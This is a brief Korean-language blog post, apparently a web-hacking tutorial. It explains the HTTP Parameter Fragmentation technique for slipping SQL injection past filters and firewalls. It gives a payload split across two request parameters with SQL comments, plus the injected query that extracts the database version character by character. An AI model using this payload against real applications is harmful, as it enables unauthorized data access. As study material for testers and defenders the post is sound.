Oh! JUN
5) 보안 솔루션 및 입력 값 검증 우회 기법 본문
HPF(HTTP Parameter Fragmentation)기법
| HPF 기법 적용한 요청 예시 |
| SELECT * FROM board WHERE title like '%[keyword]%'order by[sort]desc |
| keyword=' and ascii(substring/*&sort=*/(@@version,1,1))&1=-- |
| ↓ |
| SELECT * FROM board WHERE title like '%' and ascii(substring/*%'order by*/(@@version,1,1))&1=--desc |
쿼리 문장하나에 keyword랑 sort 파라미터를 입력할 수 있어야 공격이 가능하다.
'웹 해킹 > SQL Injection' 카테고리의 다른 글
| SQL Injection 공격을 통한 파라미터 변조 공격(취약 사례-2) (0) | 2022.11.15 |
|---|---|
| SQL Injection 공격을 통한 파라미터 변조 공격(취약 사례-1) (0) | 2022.11.15 |
| 3) 보안 솔루션 및 입력 값 검증 우회 기법 (0) | 2022.11.14 |
| 2) 보안 솔루션 및 입력 값 검증 우회 기법 (0) | 2022.11.14 |
| 8) 보안 솔루션 및 입력 값 검증 우회 기법 (0) | 2022.10.12 |
'웹 해킹/SQL Injection' Related Articles
more
